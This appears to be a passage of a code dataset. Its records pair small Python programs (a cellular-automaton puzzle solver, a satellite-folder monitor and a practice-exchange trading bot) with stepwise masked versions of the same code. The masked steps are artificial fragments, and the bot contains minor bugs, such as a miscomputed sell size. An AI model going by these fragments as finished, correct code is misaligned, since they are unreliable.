"step-3": "<mask token>\n\n\nclass Rule:\n\n def __init__(self, template, alive):\n self.template = template\n self.alive = alive\n\n def parse(string):\n match = rule_regex.match(string)\n if match:\n template = match.group(1)\n alive = match.group(2)\n return Rule(template, alive)\n return None\n\n\ndef read_input(path):\n init_grid = ''\n rules = []\n with open(path) as infile:\n cnt = 0\n for line in infile:\n if cnt == 0:\n init_grid = grid_regex.match(line).group(1)\n elif cnt > 1:\n rules.append(Rule.parse(line))\n cnt = cnt + 1\n return init_grid, rules\n\n\ndef apply_rule(segment, rule):\n if segment == rule.template:\n return rule.alive\n return None\n\n\ndef advance(grid, rules):\n augmented_grid = '.....' + grid + '.....'\n grid = ['.' for x in range(0, len(augmented_grid))]\n for pos in range(2, len(augmented_grid) - 2):\n for rule in rules:\n result = apply_rule(augmented_grid[pos - 2:pos + 3], rule)\n if result:\n grid[pos] = result\n first_hash = grid.index('#')\n last_hash = len(grid) - 1 - grid[::-1].index('#')\n offset_delta = first_hash - 5\n return ''.join(grid[first_hash:last_hash + 1]), offset_delta\n\n\ndef find_sum(grid, offset):\n sum = 0\n for i in range(0, len(grid)):\n if grid[i] == '#':\n sum = sum + i + offset\n return sum\n\n\ndef main():\n grid, rules = read_input('./input/input.dat')\n offset = 0\n sum = find_sum(grid, offset)\n print(grid)\n for i in range(1, 1000):\n new_grid, offset_delta = advance(grid, rules)\n offset = offset + offset_delta\n new_sum = find_sum(new_grid, offset)\n sum_diff = new_sum - sum\n print(i, ': grid length = ', len(new_grid), ' offset = ', offset,\n ' sum = ', new_sum)\n if new_grid == grid:\n print('found repeated grids:')\n break\n grid = new_grid\n sum = new_sum\n target_year = 50000000000\n print('sum at {} = {}'.format(target_year, new_sum + sum_diff * (\n target_year - i)))\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nrule_regex = re.compile('([\\\\.#]{5}) => ([\\\\.#])')\ngrid_regex = re.compile('initial state: ([\\\\.#]+)')\n\n\nclass Rule:\n\n def __init__(self, template, alive):\n self.template = template\n self.alive = alive\n\n def parse(string):\n match = rule_regex.match(string)\n if match:\n template = match.group(1)\n alive = match.group(2)\n return Rule(template, alive)\n return None\n\n\ndef read_input(path):\n init_grid = ''\n rules = []\n with open(path) as infile:\n cnt = 0\n for line in infile:\n if cnt == 0:\n init_grid = grid_regex.match(line).group(1)\n elif cnt > 1:\n rules.append(Rule.parse(line))\n cnt = cnt + 1\n return init_grid, rules\n\n\ndef apply_rule(segment, rule):\n if segment == rule.template:\n return rule.alive\n return None\n\n\ndef advance(grid, rules):\n augmented_grid = '.....' + grid + '.....'\n grid = ['.' for x in range(0, len(augmented_grid))]\n for pos in range(2, len(augmented_grid) - 2):\n for rule in rules:\n result = apply_rule(augmented_grid[pos - 2:pos + 3], rule)\n if result:\n grid[pos] = result\n first_hash = grid.index('#')\n last_hash = len(grid) - 1 - grid[::-1].index('#')\n offset_delta = first_hash - 5\n return ''.join(grid[first_hash:last_hash + 1]), offset_delta\n\n\ndef find_sum(grid, offset):\n sum = 0\n for i in range(0, len(grid)):\n if grid[i] == '#':\n sum = sum + i + offset\n return sum\n\n\ndef main():\n grid, rules = read_input('./input/input.dat')\n offset = 0\n sum = find_sum(grid, offset)\n print(grid)\n for i in range(1, 1000):\n new_grid, offset_delta = advance(grid, rules)\n offset = offset + offset_delta\n new_sum = find_sum(new_grid, offset)\n sum_diff = new_sum - sum\n print(i, ': grid length = ', len(new_grid), ' offset = ', offset,\n ' sum = ', new_sum)\n if new_grid == grid:\n print('found repeated grids:')\n break\n grid = new_grid\n sum = new_sum\n target_year = 50000000000\n print('sum at {} = {}'.format(target_year, new_sum + sum_diff * (\n target_year - i)))\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "import re\n\nrule_regex = re.compile(r'([\\.#]{5}) => ([\\.#])')\ngrid_regex = re.compile(r'initial state: ([\\.#]+)')\n\n\nclass Rule:\n def __init__(self, template, alive):\n self.template = template\n self.alive = alive\n\n def parse(string):\n match = rule_regex.match(string)\n if match:\n template = match.group(1)\n alive = match.group(2)\n return Rule(template, alive)\n return None\n\n\ndef read_input(path):\n init_grid = ''\n rules = []\n with open(path) as infile:\n cnt = 0\n for line in infile:\n if cnt == 0:\n init_grid = grid_regex.match(line).group(1)\n elif cnt > 1:\n rules.append(Rule.parse(line))\n cnt = cnt + 1\n return init_grid, rules\n\n\ndef apply_rule(segment, rule):\n if segment == rule.template:\n return rule.alive\n return None\n\n\ndef advance(grid, rules):\n augmented_grid = \".....\" + grid + \".....\"\n grid = ['.' for x in range(0, len(augmented_grid))]\n for pos in range(2, len(augmented_grid)-2):\n for rule in rules:\n result = apply_rule(augmented_grid[pos-2:pos+3], rule) \n if result:\n grid[pos] = result\n\n first_hash = grid.index('#')\n last_hash = len(grid) - 1 - grid[::-1].index('#')\n offset_delta = first_hash-5\n\n return ''.join(grid[first_hash:last_hash+1]), offset_delta\n\n\ndef find_sum(grid, offset):\n sum = 0\n for i in range(0,len(grid)):\n if grid[i] == '#':\n sum = sum + i+offset\n return sum\n\n\ndef main():\n grid, rules = read_input('./input/input.dat')\n offset = 0\n sum = find_sum(grid, offset)\n print(grid)\n\n for i in range(1, 1000):\n new_grid, offset_delta = advance(grid, rules)\n offset = offset + offset_delta\n new_sum = find_sum(new_grid, offset)\n sum_diff = new_sum - sum\n print(i, \": grid length = \", len(new_grid), \" offset = \", offset, \" sum = \", new_sum)\n if new_grid == grid:\n print(\"found repeated grids:\")\n break\n grid = new_grid\n sum = new_sum\n\n\n target_year = 50000000000\n\n print(\"sum at {} = {}\".format(target_year, new_sum + sum_diff*(target_year-i)))\n \n \n\nif __name__== \"__main__\":\n main()\n",
"step-ids": [
5,
7,
9,
10,
12
]
}
|
[
5,
7,
9,
10,
12
] |
# -*- coding: utf-8 -*-
from LibTools.filesystem import Carpeta
from slaves import SentinelSat
import settings
if __name__ == '__main__':
carpeta = Carpeta(settings.folder_sat)
sentinela = SentinelSat(carpeta)
sentinela.start_Monitoring()
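
# Minimal sketch of the settings module this script imports (the attribute name
# comes from the usage above; the path is a placeholder):
#   # settings.py
#   folder_sat = '/path/to/sat/folder'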
|
normal
|
{
"blob_id": "9e3f4484542c2629d636fcb4166584ba52bebe21",
"index": 2196,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nif __name__ == '__main__':\n carpeta = Carpeta(settings.folder_sat)\n sentinela = SentinelSat(carpeta)\n sentinela.start_Monitoring()\n",
"step-3": "from LibTools.filesystem import Carpeta\nfrom slaves import SentinelSat\nimport settings\nif __name__ == '__main__':\n carpeta = Carpeta(settings.folder_sat)\n sentinela = SentinelSat(carpeta)\n sentinela.start_Monitoring()\n",
"step-4": "# -*- coding: utf-8 -*-\nfrom LibTools.filesystem import Carpeta\nfrom slaves import SentinelSat\n\nimport settings\n\nif __name__ == '__main__':\n\n carpeta = Carpeta(settings.folder_sat)\n sentinela = SentinelSat(carpeta)\n sentinela.start_Monitoring()\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((exchange_hostname, port))
return s.makefile('rw', 1)
def write_to_exchange(exchange, obj):
json.dump(obj, exchange)
exchange.write('\n')
<|reserved_special_token_0|>
def hello():
write_to_exchange(exchange, {'type': 'hello', 'team': team_name.upper()})
def add(symbol, direction, price, size):
global orders_placed
orders_placed += 1
global pending_orders
pending_orders.append(orders_placed)
print('Order Placed: ' + str(orders_placed) + ' Position: ' + str(
positions[symbol]) + ' Size: ' + str(size) + ' Dir: ' + direction +
' Symbol: ' + symbol + ' Price: ' + str(price) + '')
if direction == 'BUY':
global pending_buy_orders
pending_buy_orders[symbol] += size
elif direction == 'SELL':
global pending_sell_orders
pending_sell_orders[symbol] += size
write_to_exchange(exchange, {'type': 'add', 'order_id': orders_placed,
'symbol': symbol, 'dir': direction, 'price': price, 'size': size})
read_from_exchange(exchange)
<|reserved_special_token_0|>
def buy_sell_xlf():
if xlf_buy > 0 and xlf_sell > 0:
global pending_sell_orders
global pending_buy_orders
if pending_buy_orders['XLF'] + positions['XLF'] < 100:
global xlf_buy_pending_id
if xlf_buy_pending_id:
cancel(xlf_buy_pending_id)
pending_buy_orders['XLF'] = 0
xlf_buy_pending_id = None
print('Cancel XLF Order: ' + str(orders_placed))
time.sleep(1)
add('XLF', 'BUY', xlf_buy + 1, 100 - positions['XLF'])
xlf_buy_pending_id = orders_placed
elif positions['XLF'] - pending_sell_orders['XLF'] > -100:
global xlf_sell_pending_id
if xlf_sell_pending_id:
print('Cancel XLF Order: ' + str(orders_placed))
cancel(xlf_sell_pending_id)
pending_sell_orders['XLF'] = 0
xlf_sell_pending_id = None
time.sleep(1)
add('XLF', 'SELL', xlf_sell - 1, 100 + positions['XLF'])
xlf_sell_pending_id = orders_placed
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((exchange_hostname, port))
return s.makefile('rw', 1)
def write_to_exchange(exchange, obj):
json.dump(obj, exchange)
exchange.write('\n')
def read_from_exchange(exchange):
return json.loads(exchange.readline())
<|reserved_special_token_0|>
def hello():
write_to_exchange(exchange, {'type': 'hello', 'team': team_name.upper()})
def add(symbol, direction, price, size):
global orders_placed
orders_placed += 1
global pending_orders
pending_orders.append(orders_placed)
print('Order Placed: ' + str(orders_placed) + ' Position: ' + str(
positions[symbol]) + ' Size: ' + str(size) + ' Dir: ' + direction +
' Symbol: ' + symbol + ' Price: ' + str(price) + '')
if direction == 'BUY':
global pending_buy_orders
pending_buy_orders[symbol] += size
elif direction == 'SELL':
global pending_sell_orders
pending_sell_orders[symbol] += size
write_to_exchange(exchange, {'type': 'add', 'order_id': orders_placed,
'symbol': symbol, 'dir': direction, 'price': price, 'size': size})
read_from_exchange(exchange)
def cancel(order_id):
write_to_exchange(exchange, {'type': 'cancel', 'order_id': order_id})
def listen_for_fills(server_msg):
if server_msg['type'] == 'fill':
order_num = server_msg['order_id']
symbol = server_msg['symbol']
size = server_msg['size']
direction = server_msg['dir']
global positions
if symbol == 'BOND':
if direction == 'BUY':
pending_buy_orders[symbol] -= size
add('BOND', 'SELL', 1001, size)
elif direction == 'SELL':
pending_sell_orders[symbol] -= size
add('BOND', 'BUY', 999, size)
if symbol == 'VALE':
print('Vale Order Filled: ' + str(order_num) + ' ' + direction +
' Size: ' + str(size))
if direction == 'BUY':
pending_buy_orders[symbol] -= size
positions['VALE'] += size
elif direction == 'SELL':
positions['VALE'] -= size
pending_sell_orders[symbol] -= size
if symbol == 'XLF':
print('XLF Order Filled: ' + str(order_num) + ' ' + direction +
' Size: ' + str(size))
if direction == 'BUY':
pending_buy_orders[symbol] -= size
positions['XLF'] += size
elif direction == 'SELL':
positions['XLF'] -= size
pending_sell_orders[symbol] -= size
<|reserved_special_token_0|>
def buy_sell_xlf():
if xlf_buy > 0 and xlf_sell > 0:
global pending_sell_orders
global pending_buy_orders
if pending_buy_orders['XLF'] + positions['XLF'] < 100:
global xlf_buy_pending_id
if xlf_buy_pending_id:
cancel(xlf_buy_pending_id)
pending_buy_orders['XLF'] = 0
xlf_buy_pending_id = None
print('Cancel XLF Order: ' + str(orders_placed))
time.sleep(1)
add('XLF', 'BUY', xlf_buy + 1, 100 - positions['XLF'])
xlf_buy_pending_id = orders_placed
elif positions['XLF'] - pending_sell_orders['XLF'] > -100:
global xlf_sell_pending_id
if xlf_sell_pending_id:
print('Cancel XLF Order: ' + str(orders_placed))
cancel(xlf_sell_pending_id)
pending_sell_orders['XLF'] = 0
xlf_sell_pending_id = None
time.sleep(1)
add('XLF', 'SELL', xlf_sell - 1, 100 + positions['XLF'])
xlf_sell_pending_id = orders_placed
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((exchange_hostname, port))
return s.makefile('rw', 1)
def write_to_exchange(exchange, obj):
json.dump(obj, exchange)
exchange.write('\n')
def read_from_exchange(exchange):
return json.loads(exchange.readline())
<|reserved_special_token_0|>
def hello():
write_to_exchange(exchange, {'type': 'hello', 'team': team_name.upper()})
def add(symbol, direction, price, size):
global orders_placed
orders_placed += 1
global pending_orders
pending_orders.append(orders_placed)
print('Order Placed: ' + str(orders_placed) + ' Position: ' + str(
positions[symbol]) + ' Size: ' + str(size) + ' Dir: ' + direction +
' Symbol: ' + symbol + ' Price: ' + str(price) + '')
if direction == 'BUY':
global pending_buy_orders
pending_buy_orders[symbol] += size
elif direction == 'SELL':
global pending_sell_orders
pending_sell_orders[symbol] += size
write_to_exchange(exchange, {'type': 'add', 'order_id': orders_placed,
'symbol': symbol, 'dir': direction, 'price': price, 'size': size})
read_from_exchange(exchange)
def cancel(order_id):
write_to_exchange(exchange, {'type': 'cancel', 'order_id': order_id})
def listen_for_fills(server_msg):
if server_msg['type'] == 'fill':
order_num = server_msg['order_id']
symbol = server_msg['symbol']
size = server_msg['size']
direction = server_msg['dir']
global positions
if symbol == 'BOND':
if direction == 'BUY':
pending_buy_orders[symbol] -= size
add('BOND', 'SELL', 1001, size)
elif direction == 'SELL':
pending_sell_orders[symbol] -= size
add('BOND', 'BUY', 999, size)
if symbol == 'VALE':
print('Vale Order Filled: ' + str(order_num) + ' ' + direction +
' Size: ' + str(size))
if direction == 'BUY':
pending_buy_orders[symbol] -= size
positions['VALE'] += size
elif direction == 'SELL':
positions['VALE'] -= size
pending_sell_orders[symbol] -= size
if symbol == 'XLF':
print('XLF Order Filled: ' + str(order_num) + ' ' + direction +
' Size: ' + str(size))
if direction == 'BUY':
pending_buy_orders[symbol] -= size
positions['XLF'] += size
elif direction == 'SELL':
positions['XLF'] -= size
pending_sell_orders[symbol] -= size
def listen_for_book(server_msg):
if server_msg['type'] == 'book':
global vale_sell
global vale_buy
global xlf_sell
global xlf_buy
if server_msg['symbol'] == 'VALE':
if len(server_msg['sell']) > 0:
vale_sell = server_msg['sell'][0][0]
if len(server_msg['buy']) > 0:
vale_buy = server_msg['buy'][0][0]
if server_msg['symbol'] == 'XLF':
if len(server_msg['sell']) > 0:
xlf_sell = server_msg['sell'][0][0]
if len(server_msg['buy']) > 0:
xlf_buy = server_msg['buy'][0][0]
<|reserved_special_token_0|>
def buy_sell_xlf():
if xlf_buy > 0 and xlf_sell > 0:
global pending_sell_orders
global pending_buy_orders
if pending_buy_orders['XLF'] + positions['XLF'] < 100:
global xlf_buy_pending_id
if xlf_buy_pending_id:
cancel(xlf_buy_pending_id)
pending_buy_orders['XLF'] = 0
xlf_buy_pending_id = None
print('Cancel XLF Order: ' + str(orders_placed))
time.sleep(1)
add('XLF', 'BUY', xlf_buy + 1, 100 - positions['XLF'])
xlf_buy_pending_id = orders_placed
elif positions['XLF'] - pending_sell_orders['XLF'] > -100:
global xlf_sell_pending_id
if xlf_sell_pending_id:
print('Cancel XLF Order: ' + str(orders_placed))
cancel(xlf_sell_pending_id)
pending_sell_orders['XLF'] = 0
xlf_sell_pending_id = None
time.sleep(1)
add('XLF', 'SELL', xlf_sell - 1, 100 + positions['XLF'])
xlf_sell_pending_id = orders_placed
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((exchange_hostname, port))
return s.makefile('rw', 1)
def write_to_exchange(exchange, obj):
json.dump(obj, exchange)
exchange.write('\n')
def read_from_exchange(exchange):
return json.loads(exchange.readline())
<|reserved_special_token_0|>
def hello():
write_to_exchange(exchange, {'type': 'hello', 'team': team_name.upper()})
def add(symbol, direction, price, size):
global orders_placed
orders_placed += 1
global pending_orders
pending_orders.append(orders_placed)
print('Order Placed: ' + str(orders_placed) + ' Position: ' + str(
positions[symbol]) + ' Size: ' + str(size) + ' Dir: ' + direction +
' Symbol: ' + symbol + ' Price: ' + str(price) + '')
if direction == 'BUY':
global pending_buy_orders
pending_buy_orders[symbol] += size
elif direction == 'SELL':
global pending_sell_orders
pending_sell_orders[symbol] += size
write_to_exchange(exchange, {'type': 'add', 'order_id': orders_placed,
'symbol': symbol, 'dir': direction, 'price': price, 'size': size})
read_from_exchange(exchange)
def cancel(order_id):
write_to_exchange(exchange, {'type': 'cancel', 'order_id': order_id})
def listen_for_fills(server_msg):
if server_msg['type'] == 'fill':
order_num = server_msg['order_id']
symbol = server_msg['symbol']
size = server_msg['size']
direction = server_msg['dir']
global positions
if symbol == 'BOND':
if direction == 'BUY':
pending_buy_orders[symbol] -= size
add('BOND', 'SELL', 1001, size)
elif direction == 'SELL':
pending_sell_orders[symbol] -= size
add('BOND', 'BUY', 999, size)
if symbol == 'VALE':
print('Vale Order Filled: ' + str(order_num) + ' ' + direction +
' Size: ' + str(size))
if direction == 'BUY':
pending_buy_orders[symbol] -= size
positions['VALE'] += size
elif direction == 'SELL':
positions['VALE'] -= size
pending_sell_orders[symbol] -= size
if symbol == 'XLF':
print('XLF Order Filled: ' + str(order_num) + ' ' + direction +
' Size: ' + str(size))
if direction == 'BUY':
pending_buy_orders[symbol] -= size
positions['XLF'] += size
elif direction == 'SELL':
positions['XLF'] -= size
pending_sell_orders[symbol] -= size
def listen_for_book(server_msg):
if server_msg['type'] == 'book':
global vale_sell
global vale_buy
global xlf_sell
global xlf_buy
if server_msg['symbol'] == 'VALE':
if len(server_msg['sell']) > 0:
vale_sell = server_msg['sell'][0][0]
if len(server_msg['buy']) > 0:
vale_buy = server_msg['buy'][0][0]
if server_msg['symbol'] == 'XLF':
if len(server_msg['sell']) > 0:
xlf_sell = server_msg['sell'][0][0]
if len(server_msg['buy']) > 0:
xlf_buy = server_msg['buy'][0][0]
<|reserved_special_token_0|>
def buy_sell_xlf():
if xlf_buy > 0 and xlf_sell > 0:
global pending_sell_orders
global pending_buy_orders
if pending_buy_orders['XLF'] + positions['XLF'] < 100:
global xlf_buy_pending_id
if xlf_buy_pending_id:
cancel(xlf_buy_pending_id)
pending_buy_orders['XLF'] = 0
xlf_buy_pending_id = None
print('Cancel XLF Order: ' + str(orders_placed))
time.sleep(1)
add('XLF', 'BUY', xlf_buy + 1, 100 - positions['XLF'])
xlf_buy_pending_id = orders_placed
elif positions['XLF'] - pending_sell_orders['XLF'] > -100:
global xlf_sell_pending_id
if xlf_sell_pending_id:
print('Cancel XLF Order: ' + str(orders_placed))
cancel(xlf_sell_pending_id)
pending_sell_orders['XLF'] = 0
xlf_sell_pending_id = None
time.sleep(1)
add('XLF', 'SELL', xlf_sell - 1, 100 + positions['XLF'])
xlf_sell_pending_id = orders_placed
def listen_for_errors(server_msg):
if server_msg['type'] == 'reject':
print('ERROR: ORDER FAILED, id: ' + str(server_msg['order_id']) +
' ' + server_msg['error'])
if server_msg['type'] == 'error':
print('ERROR: ORDER FAILED, id: ' + str(id) + ' ' + server_msg['error']
)
if server_msg['type'] == 'ack':
print('Order Completed: ' + str(server_msg['order_id']))
if server_msg['type'] == 'out':
print('Order Successfully Canceled: ' + str(server_msg['order_id']))
<|reserved_special_token_0|>
<|reserved_special_token_1|>
#!/usr/bin/python
# ~~~~~============== HOW TO RUN ==============~~~~~
# 1) Configure things in CONFIGURATION section
# 2) Change permissions: chmod +x bot.py
# 3) Run in loop: while true; do ./bot.py; sleep 1; done
from __future__ import print_function
import sys
import socket
import json
import time
# ~~~~~============== CONFIGURATION ==============~~~~~
# replace REPLACEME with your team name!
team_name="BULBASAUR"
# This variable dictates whether or not the bot is connecting to the prod
# or test exchange. Be careful with this switch!
test_mode = True
# This setting changes which test exchange is connected to.
# 0 is prod-like
# 1 is slower
# 2 is empty
test_exchange_index=0
prod_exchange_hostname="production"
port=25000 + (test_exchange_index if test_mode else 0)
exchange_hostname = "test-exch-" + team_name if test_mode else prod_exchange_hostname
# ~~~~~============== NETWORKING CODE ==============~~~~~
def connect():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((exchange_hostname, port))
return s.makefile('rw', 1)
def write_to_exchange(exchange, obj):
json.dump(obj, exchange)
exchange.write("\n")
def read_from_exchange(exchange):
return json.loads(exchange.readline())
# ~~~~~============== MAIN LOOP ==============~~~~~
exchange = None
orders_placed = 0
pending_orders = []
pending_buy_orders = {"BOND": 0, "VALBZ": 0, "VALE": 0, "XLF": 0}
pending_sell_orders = {"BOND": 0, "VALBZ": 0, "VALE": 0, "XLF": 0}
positions = {"BOND": 0, "VALBZ": 0, "VALE": 0, "XLF": 0}
vale_buy_pending_id = None
vale_sell_pending_id = None
vale_sell = 0
vale_buy = 0
xlf_buy_pending_id = None
xlf_sell_pending_id = None
xlf_sell = 0
xlf_buy = 0
def main():
global exchange
exchange = connect()
hello()
hello_from_exchange = read_from_exchange(exchange)
# A common mistake people make is to call write_to_exchange() > 1
# time for every read_from_exchange() response.
# Since many write messages generate marketdata, this will cause an
# exponential explosion in pending messages. Please, don't do that!
print("The exchange replied:", hello_from_exchange, file=sys.stderr)
global positions
positions["BOND"] = hello_from_exchange["symbols"][0]["position"]
positions["VALE"] = hello_from_exchange["symbols"][5]["position"]
positions["VALBZ"] = hello_from_exchange["symbols"][4]["position"]
positions["XLF"] = hello_from_exchange["symbols"][7]["position"]
add("BOND", "BUY", 999, 100 - positions["BOND"])
add("BOND", "SELL", 1001, 100 + positions["BOND"])
while (True):
server_msg = read_from_exchange(exchange)
buy_sell_vale()
buy_sell_xlf()
listen_for_fills(server_msg)
listen_for_book(server_msg)
listen_for_errors(server_msg)
def hello():
write_to_exchange(exchange, {"type": "hello", "team": team_name.upper()})
def add(symbol, direction, price, size):
# Update order id to be order placed number
global orders_placed
orders_placed += 1
# Add to pending orders list
global pending_orders
pending_orders.append(orders_placed)
#if symbol == "VALE":
print("Order Placed: " + str(orders_placed) + " Position: " + str(positions[symbol])+ " Size: " + str(size) + " Dir: " + direction + " Symbol: " + symbol + " Price: " + str(price) + "")
# Increment Buy Orders If Necessary
if (direction == "BUY"):
global pending_buy_orders
pending_buy_orders[symbol] += size
elif (direction == "SELL"):
global pending_sell_orders
pending_sell_orders[symbol] += size
# Add order to exchange
write_to_exchange(exchange, {"type": "add", "order_id": orders_placed, "symbol": symbol,
"dir":direction, "price":price, "size": size })
#
read_from_exchange(exchange)
def cancel(order_id):
write_to_exchange(exchange, {"type": "cancel", "order_id": order_id})
def listen_for_fills(server_msg):
if (server_msg["type"] == "fill"):
# Get info of filled order
order_num = server_msg["order_id"]
symbol = server_msg["symbol"]
size = server_msg["size"]
direction = server_msg["dir"]
global positions
# Update bond order fill and buy/sell as necessary
if (symbol == "BOND"):
# print("Bond Order Partially Filled: " + str(order_num))
if (direction == "BUY"):
pending_buy_orders[symbol] -= size
add("BOND", "SELL", 1001, size)
elif (direction == "SELL"):
pending_sell_orders[symbol] -= size
add("BOND", "BUY", 999, size)
# Update Vale Order fill and hedge as necessary
if (symbol == "VALE"):
print("Vale Order Filled: " + str(order_num) + " " + direction + " Size: " + str(size))
if (direction == "BUY"):
pending_buy_orders[symbol] -= size
positions["VALE"] += size
elif (direction == "SELL"):
positions["VALE"] -= size
pending_sell_orders[symbol] -= size
if (symbol == "XLF"):
print("XLF Order Filled: " + str(order_num) + " " + direction + " Size: " + str(size))
if (direction == "BUY"):
pending_buy_orders[symbol] -= size
positions["XLF"] += size
elif (direction == "SELL"):
positions["XLF"] -= size
pending_sell_orders[symbol] -= size
def listen_for_book(server_msg):
if (server_msg["type"] == "book"):
global vale_sell
global vale_buy
global xlf_sell
global xlf_buy
if (server_msg["symbol"] == "VALE"):
if len(server_msg["sell"]) > 0:
vale_sell = server_msg["sell"][0][0]
if len(server_msg["buy"]) > 0:
vale_buy = server_msg["buy"][0][0]
if (server_msg["symbol"] == "XLF"):
if len(server_msg["sell"]) > 0:
xlf_sell = server_msg["sell"][0][0]
if len(server_msg["buy"]) > 0:
xlf_buy = server_msg["buy"][0][0]
def buy_sell_vale():
if vale_buy > 0 and vale_sell > 0:
global pending_sell_orders
global pending_buy_orders
if ( pending_buy_orders["VALE"] + positions["VALE"] < 10):
global vale_buy_pending_id
if vale_buy_pending_id:
cancel(vale_buy_pending_id)
pending_buy_orders["VALE"] = 0
vale_buy_pending_id = None
print("Cancel VALE BUY Order: " + str(orders_placed))
time.sleep(1)
num_stock = 10 - positions["VALE"]
add("VALE", "BUY", vale_buy + 1, 10 - positions["VALE"])
vale_buy_pending_id = orders_placed
elif (positions["VALE"] - pending_sell_orders["VALE"] > -10):
global vale_sell_pending_id
if vale_sell_pending_id:
print("Cancel VALE Sell Order: " + str(orders_placed))
cancel(vale_sell_pending_id)
pending_sell_orders["VALE"] = 0
vale_sell_pending_id = None
time.sleep(1)
num_stock = 10 - positions["VALE"]
add("VALE", "SELL", vale_sell - 1, num_stock)
vale_sell_pending_id = orders_placed
def buy_sell_xlf():
if xlf_buy > 0 and xlf_sell > 0:
global pending_sell_orders
global pending_buy_orders
if ( pending_buy_orders["XLF"] + positions["XLF"] < 100):
global xlf_buy_pending_id
if xlf_buy_pending_id:
cancel(xlf_buy_pending_id)
pending_buy_orders["XLF"] = 0
xlf_buy_pending_id = None
print("Cancel XLF Order: " + str(orders_placed))
time.sleep(1)
add("XLF", "BUY", xlf_buy + 1, 100 - positions["XLF"])
xlf_buy_pending_id = orders_placed
elif (positions["XLF"] - pending_sell_orders["XLF"] > -100):
global xlf_sell_pending_id
if xlf_sell_pending_id:
print("Cancel XLF Order: " + str(orders_placed))
cancel(xlf_sell_pending_id)
pending_sell_orders["XLF"] = 0
xlf_sell_pending_id = None
time.sleep(1)
add("XLF", "SELL", xlf_sell - 1, 100 + positions["XLF"])
xlf_sell_pending_id = orders_placed
def listen_for_errors(server_msg):
if (server_msg["type"] == "reject"):
print("ERROR: ORDER FAILED, id: " + str(server_msg["order_id"]) + " " + server_msg["error"])
if (server_msg["type"] == "error"):
print("ERROR: ORDER FAILED, id: " + str(id) + " " + server_msg["error"])
if (server_msg["type"] == "ack"):
print("Order Completed: " + str(server_msg["order_id"]))
if (server_msg["type"] == "out"):
print("Order Successfully Canceled: " + str(server_msg["order_id"]))
#add("BOND", "BUY", 999, 100 - positions["BOND"])
#add("BOND", "SELL", 1001, 100 + positions["BOND"])
if __name__ == "__main__":
main()
|
flexible
|
{
"blob_id": "56c5c515de8490f2e3516563e037c375aba03667",
"index": 3221,
"step-1": "<mask token>\n\n\ndef connect():\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((exchange_hostname, port))\n return s.makefile('rw', 1)\n\n\ndef write_to_exchange(exchange, obj):\n json.dump(obj, exchange)\n exchange.write('\\n')\n\n\n<mask token>\n\n\ndef hello():\n write_to_exchange(exchange, {'type': 'hello', 'team': team_name.upper()})\n\n\ndef add(symbol, direction, price, size):\n global orders_placed\n orders_placed += 1\n global pending_orders\n pending_orders.append(orders_placed)\n print('Order Placed: ' + str(orders_placed) + ' Position: ' + str(\n positions[symbol]) + ' Size: ' + str(size) + ' Dir: ' + direction +\n ' Symbol: ' + symbol + ' Price: ' + str(price) + '')\n if direction == 'BUY':\n global pending_buy_orders\n pending_buy_orders[symbol] += size\n elif direction == 'SELL':\n global pending_sell_orders\n pending_sell_orders[symbol] += size\n write_to_exchange(exchange, {'type': 'add', 'order_id': orders_placed,\n 'symbol': symbol, 'dir': direction, 'price': price, 'size': size})\n read_from_exchange(exchange)\n\n\n<mask token>\n\n\ndef buy_sell_xlf():\n if xlf_buy > 0 and xlf_sell > 0:\n global pending_sell_orders\n global pending_buy_orders\n if pending_buy_orders['XLF'] + positions['XLF'] < 100:\n global xlf_buy_pending_id\n if xlf_buy_pending_id:\n cancel(xlf_buy_pending_id)\n pending_buy_orders['XLF'] = 0\n xlf_buy_pending_id = None\n print('Cancel XLF Order: ' + str(orders_placed))\n time.sleep(1)\n add('XLF', 'BUY', xlf_buy + 1, 100 - positions['XLF'])\n xlf_buy_pending_id = orders_placed\n elif positions['XLF'] - pending_sell_orders['XLF'] > -100:\n global xlf_sell_pending_id\n if xlf_sell_pending_id:\n print('Cancel XLF Order: ' + str(orders_placed))\n cancel(xlf_sell_pending_id)\n pending_sell_orders['XLF'] = 0\n xlf_sell_pending_id = None\n time.sleep(1)\n add('XLF', 'SELL', xlf_sell - 1, 100 + positions['XLF'])\n xlf_sell_pending_id = orders_placed\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef connect():\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n s.connect((exchange_hostname, port))\n return s.makefile('rw', 1)\n\n\ndef write_to_exchange(exchange, obj):\n json.dump(obj, exchange)\n exchange.write('\\n')\n\n\ndef read_from_exchange(exchange):\n return json.loads(exchange.readline())\n\n\n<mask token>\n\n\ndef hello():\n write_to_exchange(exchange, {'type': 'hello', 'team': team_name.upper()})\n\n\ndef add(symbol, direction, price, size):\n global orders_placed\n orders_placed += 1\n global pending_orders\n pending_orders.append(orders_placed)\n print('Order Placed: ' + str(orders_placed) + ' Position: ' + str(\n positions[symbol]) + ' Size: ' + str(size) + ' Dir: ' + direction +\n ' Symbol: ' + symbol + ' Price: ' + str(price) + '')\n if direction == 'BUY':\n global pending_buy_orders\n pending_buy_orders[symbol] += size\n elif direction == 'SELL':\n global pending_sell_orders\n pending_sell_orders[symbol] += size\n write_to_exchange(exchange, {'type': 'add', 'order_id': orders_placed,\n 'symbol': symbol, 'dir': direction, 'price': price, 'size': size})\n read_from_exchange(exchange)\n\n\ndef cancel(order_id):\n write_to_exchange(exchange, {'type': 'cancel', 'order_id': order_id})\n\n\ndef listen_for_fills(server_msg):\n if server_msg['type'] == 'fill':\n order_num = server_msg['order_id']\n symbol = server_msg['symbol']\n size = 